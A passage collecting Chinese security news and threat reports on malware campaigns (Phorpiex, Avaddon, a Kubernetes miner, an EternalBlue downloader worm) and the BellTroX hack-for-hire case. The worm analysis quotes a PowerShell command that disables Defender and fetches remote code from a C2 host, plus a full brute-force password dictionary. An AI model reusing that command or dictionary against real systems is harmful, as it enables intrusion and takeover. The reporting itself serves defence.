Valak是使用基于脚本的多阶段恶意软件，该软件劫持电子邮件并嵌入恶意URL附件，以使用无文件脚本来感染设备。 相关摘要 Valak使用了基于脚本的恶意软件，这些恶意软件在广告活动中使用，其与Gozi ConfCrew相关联。 重复的攻击活动导致一些报道将Valak误认为是Gozi。 电子邮件被收集起来并运用在“回复链攻击”中，以专门构建插件“ exchgrabber”来进一步传播。 新发现的名为“ clientgrabber”的插件还用于从注册表中窃取电子邮件凭据。 有关Varak详情请见报告：https://assets.sentinelone.com/labs/sentinel-one-valak-i   … 更多内容请至Seebug Paper阅读全文：https://paper.seebug.org/1246/     消息来源：sentinelone，译者：dengdeng。 本文由 HackerNews.cc 翻译整理，封面来源于网络。 转载请注明“转自 HackerNews.cc ” 并附上原文链接

去年8月，Proofpoint研究人员发现LookBack恶意软件在该年7月至8月间针对美国公用事业部门发起了网络攻击。通过分析8月21日至29发起的活动发现，这些攻击活动还利用恶意宏向美国各地的攻击目标发送恶意软件。与此同时，研究人员还发现了一个全新的恶意软件家族FlowCloud，这个家族也被交付给了美国的公用事业提供商。 像LookBack这样的FlowCloud恶意软件可以使攻击者完全控制受感染的系统。它的远程访问木马（RAT）功能包括访问已安装的应用程序、键盘、鼠标、屏幕、文件和服务进程，并通过这些命令控制来泄露信息。 通过观察2019年7月至11月间的网络钓鱼活动，基于威胁参与者使用共享附件宏、恶意软件安装技术和重叠交付基础结构我们可以确定LookBack和FlowCloud恶意软件都归因于我们称为TA410的威胁参与者。 此外，我们还发现TA410和TA429（APT10）之间的相似之处。具体来讲，他们之间有共同的附件宏，而且2019年11月检测到的TA410活动中还包括网络钓鱼附件传递宏中使用的与TA429（APT10）相关的基础结构。但是，Proofpoint分析师认为，黑客们可能是在故意使用TA429（APT10）技术和基础架构来进行虚假标记。因此，在进行研究时我们不会将LookBack和FlowCloud活动归因于TA429（APT10）。   … 更多内容请至Seebug Paper阅读全文：https://paper.seebug.org/1241/     消息来源：proofpoint， 译者：dengdeng。 本文由 HackerNews.cc 翻译整理，封面来源于网络。 转载请注明“转自 HackerNews.cc ” 并附上原文链接

信息窃取软件是常见的恶意软件之一。 如：多平台远程管理工具（RAT)Netwire (MITRE S0198)从2012年开始被网络犯罪组织不断使用。在我们进行网络监测期间，发现了一个特定的Office文档，该文档通过安装恶意软件插件，来对意大利人民发起隐藏性的网络攻击活动，这种攻击活动的特定供给链采取了独特的技术模式，类似于这种，本文将对此进行深入分析。   … 更多内容请至Seebug Paper阅读全文：https://paper.seebug.org/1238/     消息来源：yoroi， 译者：dengdeng。 本文由 HackerNews.cc 翻译整理，封面来源于网络。 转载请注明“转自 HackerNews.cc ” 并附上原文链接

感谢腾讯御见威胁情报中心来稿！ 原文链接：https://mp.weixin.qq.com/s/sRE5CyyEutzs_Z9BDdyGnA 一、概述 腾讯安全团队检测到Phorpiex僵尸网络病毒在国内近期较为活跃，该病毒的新版本增加了对感染32位PE文件（一种可执行文件）的能力，被感染的可执行文件被添加.zero恶意后门节代码，同时该病毒移除了检测虚拟机环境的相关代码。当已被感染的32位PE文件（通常是EXE可执行程序文件）在正常无毒的电脑中运行时，将会下载执行Phorpiex病毒主模块，实现病毒在不同电脑之间的感染传播。腾讯安全还检测到Avaddon勒索病毒使用Phorpiex僵尸网络的基础设施分发投递。 PE感染特性将导致Phorpiex僵尸网络病毒增加更多传播途径，如：已被感染的PE可执行文件可能通过移动设备的交换传播；带毒程序如果感染网站服务器，访客电脑可能通过网站下载被感染。 我们知道，感染型病毒曾经在WinXp之前的时代比较多见，现在已很少见，网民对这类病毒变得比较陌生，会有利于Phorpiex僵尸网络病毒通过网络或移动存储介质交换感染扩散。 Phorpiex僵尸网络传播途径较多，总结一下，主要有以下几种： 通过被感染的U盘、移动硬盘传播； 通过网站Web服务目录下被替换的文件下载传播； 通过被感染的压缩包文件传播； 通过VNC爆破传播； 通过感染32位PE可执行程序文件传播（新增） Phorpiex僵尸网络病毒主要通过投递、分发其它恶意病毒木马来获利。包括：挖矿木马、盗窃虚拟币的木马、群发诈骗邮件敲诈虚拟币、为其他勒索病毒提供分发渠道等等。腾讯T-Sec终端管理系统（御点）及腾讯电脑管家均可查杀Phorpiex僵尸网络病毒。 二、样本分析 被感染文件： 观察被感染后的文件可知新增了.zero节数据，运行被感染的可执行文件将会首先执行新增的恶意代码部分，再跳转到OEP处执行程序的原始功能，从而实现新的感染。 新增节内感染代码首先判断%appdata%\winsvcs.txt文件是否存在，文件属性是否隐藏。winsvcs.txt名的隐藏文件为Phorpiex病毒攻击成功后的标记文件，病毒通过检测该文件的属性来避免对已中毒主机的反复感染。 当感染代码判断该主机未被感染过，则从C2地址：88.218.16.27处拉取pe.exe模块到tmp目录执行，该文件后分析为Phorpiex病毒主文件。 拉取执行PE.exe病毒主文件完毕后，感染代码最终通过 PEB->ldr->InLoadOrderModuleList获取到当前模块基址后计算出原始未感染前入口代码地址跳转执行，以确保感染病毒后的可执行程序能正常运行。 Phorpiex僵尸网络主病毒文件： 88.218.16.27处拉取的pe.exe模块同样为加壳程序文件，内存Dump后可知，该模块为Phorpiex僵尸网络主传播模块。 该版本的Phorpiex主模块相比较老版本，在入口处的环境检测中相关代码中，将反虚拟机功能取消，只保留了反调试功能，这也意味着虚拟机环境下Phorpiex病毒也会从C2服务器下载恶意代码运行。 该版本的Phorpiex除作为downloader推广其它恶意程序外，自身主要创建4个功能线程： 线程1（老功能） 线程2（老功能） 线程3：（老功能） 线程4（新增） 感染文件过程过程是在%systemdrive%系统盘内展开的 感染目标为后缀.exe的PE类型文件，同时如果系统目录内文件绝对路径包含以下关键字符，不对其进行感染。以免感染到系统文件导致程序运行出错，从而避免被用户过早发现。 病毒感染时会排除含以下关键词的目录：windows，sys，$recycle.，service，intel，micro，boot，driver，recovery，update，drv。 文件名感染排除关键词：.exe.，win，sys，drv，driver，$，drivemgr.exe等。 感染过程采取文件映射方式，根据其感染代码可知，病毒对PE-64进行了排除，只感染32位文件。虽然如此，但由于当前Windows平台下多数软件为了兼容性未提供x64版本，故病毒依旧能够感染到大量的文件。病毒感染完成后会将内置的zero_code代码作为附加节数据添加到被感染文件中，zero_code中硬编码了一个0xCCCCCCCC常量，该常量在zero_code节代码拷贝完成后进行动态查找然后修改为原始程序OEP。 Avaddon勒索病毒与Phorpiex僵尸网络的关联 腾讯安全还捕获到通过邮件附件传播的伪装成图片的恶意样本。 附件包内图片扩展名的隐藏文件，实际为js脚本文件，只需要在文件夹选项中打开查看已知文件的扩展名。 脚本文件将会使用Poweshell或者Bitadmin尝试从217.8.117.63地址下载名为jpr.exe的文件执行，该投递方式疑为Phorpiex僵尸网络的手法。 通过腾讯安图大数据威胁情报管理可知，IP：217.8.117.63，确实为Phorpiex僵尸网络基础设施。 下载的jpr.exe经鉴定为新型Avaddon勒索病毒。 IOCs MD5: e28c6a5e9f89694a0237fe4966a6c32c 04deb3031bd87b24d32584f73775a0a8 4c7b7ce130e2daee190fc88de954292d c9ec0d9ff44f445ce5614cc87398b38d IP: 88.218.16.27 217.8.117.63 Domain: tldrbox.top tldrbox.ws URL: hxxp://88.218.16.27/1 hxxp://88.218.16.27/2 hxxp://88.218.16.27/3 hxxp://88.218.16.27/4 hxxp://88.218.16.27/5 hxxp://88.218.16.27/v hxxp://tldrbox.top/1 hxxp://tldrbox.top/2 hxxp://tldrbox.top/3 hxxp://tldrbox.top/4 hxxp://tldrbox.top/5 hxxp://tldrbox.top/v hxxp://tldrbox.ws/1 hxxp://tldrbox.ws/2 hxxp://tldrbox.ws/3 hxxp://tldrbox.ws/4 hxxp://tldrbox.ws/5 hxxp://tldrbox.ws/v hxxp://217.8.117.63/jpr.exe 参考链接 https://mp.weixin.qq.com/s/zbqLmCBblvbZQwsM2XJd2Q https://mp.weixin.qq.com/s/3kyLkoBd9K-5_VSk5Nnb6A            

北京时间6月10日早间消息，据路透社报道，一家鲜为人知的印度IT公司为客户提供黑客服务，在7年时间里对全球超过1万个电子邮件账户进行入侵。根据该公司的三名前员工披露的信息以及外部研究人员的报告和网上的种种证据，总部位于新德里的BellTroX信息技术服务公司专门瞄准欧洲的政府官员、巴哈马的博彩大亨和以及包括美国私募股权巨头KKR和做空机构浑水在内的著名投资机构。 5名知情人士表示，BellTroX针对美国目标发动的黑客行动正在面临美国执法部门的调查。但美国司法部拒绝置评。 目前还不清楚BellTroX客户的身份。但该公司的所有者苏米特·古普塔（Sumit Gupta）拒绝在电话采访中透露客户身份，并否认存在任何不当行为。  浑水创始人卡尔森·布洛克（Carson Block）说，“得知我们可能成为BellTroX客户的入侵目标时，我感到失望，但并不惊讶。”KKR拒绝置评。 互联网监督组织Citizen Lab的研究人员花费了两年多时间摸清了黑客使用的基础设施。这些研究人员周二发布报告称，他们“充分相信”BellTroX的员工充当了间谍活动的幕后黑手。 “这是有史以来受雇开展的规模最大的间谍活动之一。”Citizen Lab研究员约翰·斯科特-莱尔顿（John Scott-Railton）说。 他表示，尽管与获得国家支持的间谍组织或者引人关注的网络盗窃案相比，“网络雇佣军”并未得到太大关注，但这些服务却得以广泛使用。“我们的调查发现，没有任何领域可以幸免。” 路透社通过查看数据缓存深入研究了这项活动，结果显示，BellTroX在2013至2020年间发送了成千上万条旨在诱骗受害者透露密码的消息。该数据是由黑客使用的网络服务提供商匿名提供给路透社的，在此之前，路透社曾经警告这些公司，他们平台上的活动存在异常。 该数据相当于一份“黑名单”，列出了攻击目标和攻击时间。路透社通过与受攻击的目标收取的电子邮件进行对比，验证了这些数据的真实性。 名单包含南非的法官、墨西哥的政治人物、法国的律师和美国的环保组织。这几十个人只是BellTroX数以千计攻击目标中的一小部分，他们均未作出回应或拒绝发表评论。 目前还无法确定究竟有多少次黑客入侵活动取得成功。 BellTroX的古普塔在2015年的一次黑客案中遭到起诉，该案中有两名美国私家侦探承认向他支付费用，以入侵营销高管的帐号。古普塔在2017年被宣布为逃犯，但美国司法部拒绝评论此案当前的状况，也拒绝透露是否已提出引渡请求。 古普塔在他位于新德里的家中通过电话否认了黑客入侵行为，他还表示执法部门从未与他联系。他说，他在私家侦探向其提供登录详细信息后，才帮助他们从电子邮件收件箱中下载了消息。 “我没有帮助他们获取任何东西，我只是帮助他们下载邮件，他们向我提供了所有详细信息。”他说，“我不知道他们如何获得这些详细信息，我只是为他们提供了技术支持。” 路透社无法确定私家侦探为什么会要求古普塔帮助他们下载电子邮件。古普塔没有回复后续消息，而当路透社记者周一前往他的办公室拜访时，也一再遭到拒绝。德里警方和印度外交部发言人没有发表评论。 伪装邮件 根据路透社查看的数据，BellTroX在德里西部某零售综合体的一家已经关闭的茶摊上方的小房间内开展活动，他们用数以万计的恶意电子邮件对目标展开“轰炸”。有些信息会伪装成攻击目标的同事或亲人，还有的邮件则伪装成Facebook登录请求或色情网站退订邮件。 法哈米·奎德（Fahmi Quadir）在纽约的做空机构Safkhet Capital是BellTroX于2017年至2019年间瞄准的17家投资机构中的一家。她说，在她发起基金后不久，就注意到2018年初的电子邮件数量激增。 最初“似乎不是恶意邮件，”奎德说，“只是占星术之类的内容。然后变成色情内容。” 最终，黑客们又加大了攻击力度，向她发送了看似可信的信息，伪装成她的同事、家人或其他做空机构。奎德说：“他们甚至想假冒我的姐妹。”但她认为攻击并没有成功。 美国游说组织也屡次成为目标。其中包括数字版权组织Free Press和Fight for the Future，这两个组织都为网络中立原则展开游说。这些组织表示，少数员工帐户遭到入侵，但更广泛的网络并未受到影响。电子前沿基金会曾在2017年的报告中详细阐述了这些组织遭到的攻击，但并没有公开将此与BellTroX联系起来。 Free Press主任蒂莫西·卡尔（Timothy Karr）说，“每当我们参与激烈且备受瞩目的公共政策辩论时，攻击行为就会增加。”Fight for the Future副主任埃文·格里尔（Evan Greer）说：“如果企业和政客可以雇用数字雇佣兵来瞄准公民社会组织，就会破坏我们的民主进程。” 尽管路透社无法确定是谁雇用了BellTroX来进行黑客攻击，但该公司的两名前雇员表示，他们及其他类似公司通常会与私家侦探签约，而这些私家侦探的幕后老板其实是受攻击者的商业或政治竞争对手。 圣迭戈私家侦探公司Bulldog Investigation的巴特·桑托斯（Bart Santos）表示，他们就曾经收到了来自印度的黑客服务广告，其中有一个人自称是BellTroX的前雇员。这些广告号称可以提供“数据渗透”和“电子邮件渗透”服务。事实上，有十余家欧美私家侦探都表示曾经收到过类似的广告。 桑托斯说，他并没有理睬这些广告，但他可以理解为什么有些人会花钱雇佣这些公司。“印度人在客户服务方面声誉很好。”他说。     （稿源：新浪科技，封面源自网络。）

骗子看上去无所不能，甚至可以利用COVID-19大流行病。根据最近的一份报告，网络犯罪分子正在使用假简历和医疗休假表格来传播银行木马和窃取信息的恶意软件。自3月以来，已有超过4000万美国人首次申请失业救济，虽然目前失业率从高峰期开始下降，但仍维持在13.3%的水平。 Check Point的研究人员发现，不良分子正在趁虚而入。该公司写道，在过去两个月里，以简历为主题的电子邮件恶意活动增加了一倍，每450个恶意文件中就有1个是简历骗局。其中一个活动使用Zloader恶意软件来窃取受害者的证书和其他细节。它隐藏在电子邮件附件的恶意.xls文件中，主题词为 “申请工作 “和 “关于工作”。如果有人打开了其中一个文件，他们会被要求 “启用内容”，这时一个恶意的宏就会开始运行并下载最终的有效载荷。 另一个电子邮件活动利用了COVID-19相关病假。这些邮件的主题语为 “以下是一份员工申请表格，要求在家庭和医疗假期法案（FMLA）范围内休假”，通常包含medical-center.space 的发件人域名，它们包含Icedid恶意软件，这是另一种银行木马。 由于很多企业在封锁期间关闭，5月份与冠状病毒相关的网络攻击比4月份下降了7%，但在6月份企业重新开业后，整体网络攻击猛增16%。在过去的四周里，也有2000个恶意或可疑的冠状病毒相关域名注册。对此，安全人员要求用户永远不要打开可疑的电子邮件附件。     （稿源：cnBeta，封面源自网络。）

5月29日，我们发现了一起网络攻击事件，我们认为这该事件是由一名叫做Higaisa的渗透攻击黑客发起的。有关信息显示：Higaisa APT与朝鲜半岛有关，并于2019年初被腾讯安全威胁情报中心进行了首次披露。 该小组的活动可以追溯到2016年，活动内容包括使用特洛伊木马（例如Gh0st和PlugX）以及移动恶意软件，活动目标包括政府官员、人权组织以及与朝鲜有关的其他实体企业。 在近期的攻击活动中，Higaisa使用了一个恶意快捷文件，该文件最终导致了一个包含恶意脚本、有效载荷和欺诈PDF文档内容的多阶段攻击行为。   … 更多内容请至Seebug Paper阅读全文：https://paper.seebug.org/1235/     消息来源：malwarebytes， 译者：dengdeng。 本文由 HackerNews.cc 翻译整理，封面来源于网络。 转载请注明“转自 HackerNews.cc ” 并附上原文链接

基于 Chromium 开发的 Brave 浏览器，近日曝出了自动插入返利代码的问题。当用户搜索加密货币企业时，将被添加重定向代码以获得佣金。Decrypt.co 报道称，币安、Coinbase 和 Trezor 都在其列。事发后，Brave 首席执行官已经作出道歉，承诺今后不会再这么做，且用户能够在 brave://settings 设置页面禁用相关代码。 Twitter 网友 Yannick Eckl 率先曝光了此事，作为一款宣称对加密友好的隐私优先浏览器，Brave 此举确实对自己的声誉造成了极大的损害。 与该公司此前遵循的“选择加入”原则不同，Brave 从未向其 1500 万越活用户解释过此事。即便浏览器上的广告是可选的，且会向任何观看过的用户支付加密货币。 随着 JRR Crypto 高管 Dimitar Dinev 挖掘出了 Brave 重定向代码的更多细节，此事终于引发了一场强烈的舆论风暴。 GitHub 上托管的代码显示，该浏览器还会将用户重定向至 Ledger、Trezor 和 Coinbase 等网站。 最终，Brave 首席执行官兼联合创始人 Brendan Eich 也在 Twitter 上向公众致歉，声称该问题目前“已被修复”，且保证不会再发生类似的行为。 不过截止发稿时，Brendan Eich 尚未回应 Decrypt.co 的进一步置评请求。     （稿源：cnBeta，封面源自网络。）

感谢腾讯御见威胁情报中心来稿！ 原文链接：https://mp.weixin.qq.com/s/sBiSo9fxONI60HxGnlB-Bg   近日，腾讯安全团队接受到部分用户反馈，部分Linux主机检测到名为docker的木马文件。经现场提取排查线索后，发现该挖矿木马疑似通过低版本Kubernetes组件入侵。入侵成功后在机器内执行恶意sh脚本，恶意脚本则进行同类木马清理，同时从82.146.53.166地址拉取矿机，配置后进行非法挖矿，目前看到的恶意sh脚本主要有以下2个版本。 版本一 功能结束当前机器内的其它挖矿相关模块，下载执行32/64不同版本的elf矿机程序到主机内tmp目录命名为docker，拉取矿机配置，执行矿机后删除本地矿机相关文件。 版本二 功能为结束当前机器内的其它挖矿相关模块，下载执行32/64不同版本的elf矿机程序到主机内tmp目录命名为php，拉取矿机配置，执行矿机后再删除本地矿机相关文件。该版本脚本同时增加了计划任务项，每分钟尝试执行一次sh脚本。 Tmp下名为docker或php的门罗币挖矿矿机，执行后会进行门罗币挖矿。 安全建议 1.排查清理主机root目录下，tmp目录下的docker名可疑矿机，php名可疑矿机文件； 2.排查crontab任务列表，删除异常的定时任务项； 3.查看机器内kubernetes组件，将其升级到最新版本； 4.Kubelet 外部访问配置认证授权，禁止匿名访问。 参考链接： https://cloud.tencent.com/developer/article/1549244 https://k8smeetup.github.io/docs/admin/kubelet-authentication-authorization/ https://github.com/easzlab/kubeasz/pull/192 https://medium.com/handy-tech/analysis-of-a-kubernetes-hack-backdooring-through-kubelet-823be5c3d67c 关于Kubernetes Kubernetes是一个全新的基于容器技术的分布式架构领先方案。是Google内部集群管理系统Borg的一个开源版本。Kubernetes是一个开放的开发平台，不局限于任何一种语言，没有限定任何编程接口，是一个完备的分布式系统支撑平台。它构建在docker之上，提供应用部署、维护、扩展机制等功能，利用Kubernetes能方便地管理跨机器运行容器化的应用。 IOCs URL: hxxp://82.146.53.166/cr2.sh hxxp://82.146.53.166/xmrig_32 hxxp://82.146.53.166/p.conf hxxp://82.146.53.166/xmrig_64   MD5: 57b4ba0357815e44d8a1ac8e9c9dc7ab afb662fa877d773dafbaa47658ac176a 5110222de7330a371c83af67d46c4242

感谢腾讯御见威胁情报中心来稿！ 原文链接：https://mp.weixin.qq.com/s/QEE95HTKzuT4-NykfvHfGQ   一、背景 腾讯安全威胁情报中心检测到永恒之蓝下载器木马出现最新变种，此次变种的病毒延续上个版本的邮件蠕虫攻击方法，利用附带Office漏洞CVE-2017-8570漏洞的doc文档以及JS诱饵文件发送与新冠肺炎主题相关的钓鱼邮件。同时新增SMBGhost（CVE-2020-0796）漏洞检测和上报、新增SSH爆破攻击相关代码，推测其可能在后续攻击活动中利用SMBGhost漏洞、也可能发起针对Linux系统的攻击。 病毒Payload执行时安装随机名计划任务从新的C2地址t.zer9g.com、t.zz3r0.com下载a.jsp进行持久化攻击，a.jsp继续下载攻击模块if.bin、if_mail.bin以利用漏洞、弱口令爆破、钓鱼邮件群发等方式进行攻击传播，将XMRig门罗币矿机程序m6.bin、m6g.bin注入Powershell.exe运行。病毒还会安装没有实际功能的计划任务blackball（“黑球”），因此将此次攻击命名为“黑球”行动。 二、样本分析 1.钓鱼邮件攻击 首先从outlook应用程序会话中获取邮箱联系人。 然后自动生成readme.doc，readme.js两种附件文件，并将readme.js制作为压缩包readme.zip。其中readme.doc中包含Office漏洞CVE-2017-8570触发代码。readme.js中包含恶意Wscript脚本攻击代码。两种附件被打开后都会执行恶意命令下载http[:]//d.ackng.com/mail.jsp。 在$mail.Body中添加待发送邮件的邮件主题内容，从预置的9个主题中随机选择，主要包含“新冠肺炎COVID-19”， “日常联系对话”，“文件损坏无法查看”三种类型，具体内容如下： 生成的钓鱼邮件示例如下： 最后针对邮箱中发现的每一个联系人，依次发送包含恶意代码的附件readme.doc、readme.zip的邮件。 2.弱口令爆破 RDP（3389端口）弱口令爆破 爆破用户名：“administrator”，密码字典： `”saadmin”,“123456”,“test1”,“zinch”,“g_czechout”,“asdf”,“Aa123456.”,“dubsmash”,“password”,“PASSWORD”,“123.com”,“admin@123”,“Aa123456”,“qwer12345”,“Huawei@123”,“123@abc”,“golden”,“123!@#qwe”,“1qaz@WSX”,“Ab123”,“1qaz!QAZ”,“Admin123”,“Administrator”,“Abc123”,“Admin@123”,“999999”,“Passw0rd”,“123qwe!@#”,“football”,“welcome”,“1”,“12”,“21”,“123”,“321”,“1234”,“12345”,“123123”,“123321”,“111111”,“654321”,“666666”,“121212”,“000000”,“222222”,“888888”,“1111”,“555555”,“1234567”,“12345678”,“123456789”,“987654321”,“admin”,“abc123”,“abcd1234”,“abcd@1234”,“abc@123”,“p@ssword”,“P@ssword”,“p@ssw0rd”,“P@ssw0rd”,“P@SSWORD”,“P@SSW0RD”,“P@w0rd”,“P@word”,“iloveyou”,“monkey”,“login”,“passw0rd”,“master”,“hello”,“qazwsx”,“password1”,“Password1”,“qwerty”,“baseball”,“qwertyuiop”,“superman”,“1qaz2wsx”,“fuckyou”,“123qwe”,“zxcvbn”,“pass”,“aaaaaa”,“love”,“administrator”,“qwe1234A”,“qwe1234a”,“123123123”,“1234567890”,“88888888”,“111111111”,“112233”,“a123456”,“123456a”,“5201314”,“1q2w3e4r”,“qwe123”,“a123456789”,“123456789a”,“dragon”,“sunshine”,“princess”,“!@#$%^&*”,“charlie”,“aa123456”,“homelesspa”,“1q2w3e4r5t”,“sa”,“sasa”,“sa123”,“sql2005”,“sa2008”,“abc”,“abcdefg”,“sapassword”,“Aa12345678”,“ABCabc123”,“sqlpassword”,“sql2008”,“11223344”,“admin888”,“qwe1234”,“A123456”,“OPERADOR”,“Password123”,“test123”,“NULL”,“user”,“test”,“Password01”,“stagiaire”,“demo”,“scan”,“P@ssw0rd123”,“xerox”,“compta”`。 爆破成功后会上报该机器的IP以及此次成功登陆使用的密码，然后利用rdpexec模块远程执行代码$rdp_code: cmd /c powershell Set-MpPreference-DisableRealtimeMonitoring 1;Add-MpPreference -ExclusionProcess c:\windows\system32\WindowsPowerShell\v1.0\powershell.exe&powershellIEX(New-Object Net.WebClient).DownloadString(”http[:]//t.amynx.com/rdp.jsp”) SMB爆破攻击（445端口） 爆破使用用户名为”administrator”,”admin”，爆破成功后远程执行代码$ipc_code： MSSQL爆破攻击（1433端口） 使用与RDP爆破同样的密码字典，爆破成功后远程执行代码$mscmd_code： 此外，最新的攻击代码中还加如了SSH爆破相关命令，该代码将会启动SSH爆破模块，并在爆破成功后执行远程命令$ssh_cmd。但是目前该功能并未启用，相关可能还在开发阶段，后续如果启用之后，可能会导致被感染的Windows机器通过SSH爆破攻击Linux系统。 3.漏洞攻击 1)   SMBGhost漏洞利用 永恒之蓝下载器木马变种会利用公开的漏洞检测代码检测存在SMBGhost漏洞（编号：CVE-2020-0796、绰号：永恒之黑）的机器IP并上报。 2020年3月12日腾讯安全威胁情报中心发布了SMBv3远程代码执行漏洞CVE-2020-0796（别名：SMBGhost，绰号：永恒之黑）预警公告：https://mp.weixin.qq.com/s/zwuDziMherWbUY2S2rrD8Q 2020年6月2日，国外安全研究员公开了一份SMBGhost漏洞CVE-2020-0796漏洞的RCE代码，腾讯安全团队已对其进行分析并预警：https://mp.weixin.qq.com/s/LDWRacyVMAu2JGZUJf3qKQ 该漏洞的后果十分接近永恒之蓝系列，都利用Windows SMB漏洞远程攻击获取系统最高权限，除了直接攻击SMB服务端造成RCE外，攻击者可以构造特定的网页，压缩包，共享目录，OFFICE文档等多种方式触发漏洞进行攻击。由于漏洞利用源代码被公布，使得漏洞利用风险骤然升级，被黑灰产修改即可用于网络攻击。 2)   永恒之蓝漏洞利用 利用永恒之蓝漏洞攻击，攻击后远程执行代码$sc_code。 3)   Lnk漏洞（CVE-2017-8464）利用 Lnk漏洞利用CVE-2017-8464，在可移动盘、网络磁盘下创建具有CVE-2017-8464漏洞攻击代码的Lnk文件，一旦该文件被查看就会导致恶意代码执行。同时还会释放JS文件readme.js，通过伪装的文件在被误点击时感染病毒。 4.清除竞品挖矿木马 永恒之蓝下载器木马在攻击代码if.bin中Killer()函数中会详细地搜集大量竞争对手挖矿木马的信息，包括各类挖矿木马安装的服务、计划任务、进程名，以及挖矿使用的命令行特点、端口号特点来锁定目标并进行清除。 通过服务名匹配： `$SrvName =“xWinWpdSrv”, “SVSHost”, “Microsoft Telemetry”, “lsass”, “Microsoft”, “system”, “Oracleupdate”, “CLR”, “sysmgt”, “\gm”, “WmdnPnSN”, “Sougoudl”,“National”, “Nationaaal”, “Natimmonal”, “Nationaloll”, “Nationalmll”,“Nationalaie”,“Nationalwpi”,“WinHelp32”,“WinHelp64”, “Samserver”, “RpcEptManger”, “NetMsmqActiv Media NVIDIA”, “Sncryption Media Playeq”,“SxS”,“WinSvc”,“mssecsvc2.1”,“mssecsvc2.0”,“Windows_Update”,“Windows Managers”,“SvcNlauser”,“WinVaultSvc”,“Xtfy”,“Xtfya”,“Xtfyxxx”,“360rTys”,“IPSECS”,“MpeSvc”,“SRDSL”,“WifiService”,“ALGM”,“wmiApSrvs”,“wmiApServs”,“taskmgr1”,“WebServers”,“ExpressVNService”,“WWW.DDOS.CN.COM”,“WinHelpSvcs”,“aspnet_staters”,“clr_optimization”,“AxInstSV”,“Zational”,“DNS Server”,“Serhiez”,“SuperProServer”,“.Net CLR”,“WissssssnHelp32”,“WinHasdadelp32”,“WinHasdelp32”,“ClipBooks”` 通过计划任务名匹配： `$TaskName = “my1″,”Mysa”, “Mysa1”, “Mysa2”, “Mysa3”, “ok”, “Oracle Java”, “Oracle Java Update“, “Microsoft Telemetry“, “Spooler SubSystem Service“,”Oracle Products Reporter“, “Update service for products“, “gm“, “ngm“,”Sorry“,”Windows_Update“,”Update_windows“,”WindowsUpdate1“,”WindowsUpdate2“,”WindowsUpdate3“,”AdobeFlashPlayer“,”FlashPlayer1“,”FlashPlayer2“,”FlashPlayer3“,”IIS“,”WindowsLogTasks“,”System Log Security Check“,”Update“,”Update1“,”Update2“,”Update3“,”Update4“,”DNS“,”SYSTEM“,”DNS2“,”SYSTEMa“,”skycmd“,”Miscfost“,”Netframework“,”Flash“,”RavTask“,”GooglePingConfigs“,”HomeGroupProvider“,”MiscfostNsi“,”WwANsvc“,”Bluetooths“,”Ddrivers“,”DnsScan“,”WebServers“,”Credentials“,”TablteInputout“,”werclpsyport“,”HispDemorn“,”LimeRAT-Admin“,”DnsCore“,”Update service for Windows Service“,”DnsCore“,”ECDnsCore“` 通过命令行特征匹配： `$_.CommandLine -like‘*pool.monero.hashvault.pro*’ –Or $_.CommandLine -like ‘*blazepool*’ –Or$_.CommandLine -like ‘*blockmasters*’ –Or $_.CommandLine -like‘*blockmasterscoins*’ –Or $_.CommandLine -like ‘*bohemianpool*’ –Or$_.CommandLine -like ‘*cryptmonero*’ –Or $_.CommandLine -like ‘*cryptonight*’–Or $_.CommandLine -like ‘*crypto-pool*’ –Or $_.CommandLine -like‘*–donate-level*’ –Or $_.CommandLine -like ‘*dwarfpool*’ –Or $_.CommandLine-like ‘*hashrefinery*’ –Or $_.CommandLine -like ‘*hashvault.pro*’ –Or$_.CommandLine -like ‘*iwanttoearn.money*’ –Or $_.CommandLine -like‘*–max-cpu-usage*’ –Or $_.CommandLine -like ‘*mine.bz*’ –Or $_.CommandLine-like ‘*minercircle.com*’ –Or $_.CommandLine -like ‘*minergate*’ –Or$_.CommandLine -like ‘*miners.pro*’ –Or $_.CommandLine -like ‘*mineXMR*’ –Or$_.CommandLine -like ‘*minexmr*’ –Or $_.CommandLine -like ‘*mineXMR*’ –Or$_.CommandLine -like ‘*mineXMR*’ –Or $_.CommandLine -like‘*miningpoolhubcoins*’ –Or $_.CommandLine -like ‘*mixpools.org*’ –Or$_.CommandLine -like ‘*mixpools.org*’ –Or $_.CommandLine -like ‘*monero*’ –Or$_.CommandLine -like ‘*monero*’ –Or $_.CommandLine -like‘*monero.lindon-pool.win*’ –Or $_.CommandLine -like ‘*moriaxmr.com*’ –Or $_.CommandLine-like ‘*mypool.online*’ –Or $_.CommandLine -like ‘*nanopool.org*’ –Or$_.CommandLine -like ‘*nicehash*’ –Or $_.CommandLine -like ‘*-p x*’ –Or$_.CommandLine -like ‘*pool.electroneum.hashvault.pro*’ –Or $_.CommandLine-like ‘*pool.xmr*’ –Or $_.CommandLine -like ‘*poolto.be*’ –Or $_.CommandLine-like ‘*prohash*’ –Or $_.CommandLine -like ‘*prohash.net*’ –Or $_.CommandLine-like ‘*ratchetmining.com*’ –Or $_.CommandLine -like ‘*slushpool*’ –Or$_.CommandLine -like ‘*stratum+*’ –Or $_.CommandLine -like ‘*suprnova.cc*’ –Or$_.CommandLine -like ‘*teracycle.net*’ –Or $_.CommandLine -like ‘*usxmrpool*’–Or $_.CommandLine -like ‘*viaxmr.com*’ –Or $_.CommandLine -like ‘*xmrpool*’–Or $_.CommandLine -like ‘*yiimp*’ –Or $_.CommandLine -like ‘*zergpool*’ –Or $_.CommandLine-like ‘*zergpoolcoins*’ –Or $_.CommandLine -like ‘*zpool*’` 通过网络端口匹配： `($psids[0] -eq $line[-1]) –and $t.contains(“ESTABLISHED”) –and ($t.contains(“:1111”) –or $t.contains(“:2222”) –or $t.contains(“:3333”) –or $t.contains(“:4444”) –or $t.contains(“:5555”) –or $t.contains(“:6666”) –or $t.contains(“:7777”) –or $t.contains(“:8888”) –or $t.contains(“:9999”) –or $t.contains(“:14433”) –or $t.contains(“:14444”) –or $t.contains(“:45560”) –or $t.contains(“:65333”))` 通过进程名匹配： `$Miner =“SC”,“WerMgr”,“WerFault”,“DW20”,“msinfo”, “XMR*”,“xmrig*”, “minerd”, “MinerGate”, “Carbon”, “yamm1”, “upgeade”, “auto-upgeade”, “svshost”, “SystemIIS”, “SystemIISSec”, &apos;WindowsUpdater*&apos;, “WindowsDefender*”, “update”, “carss”, “service”, “csrsc”, “cara”, “javaupd”, “gxdrv”, “lsmosee”, “secuams”, “SQLEXPRESS_X64_86”, “Calligrap”, “Sqlceqp”, “Setting”, “Uninsta”, 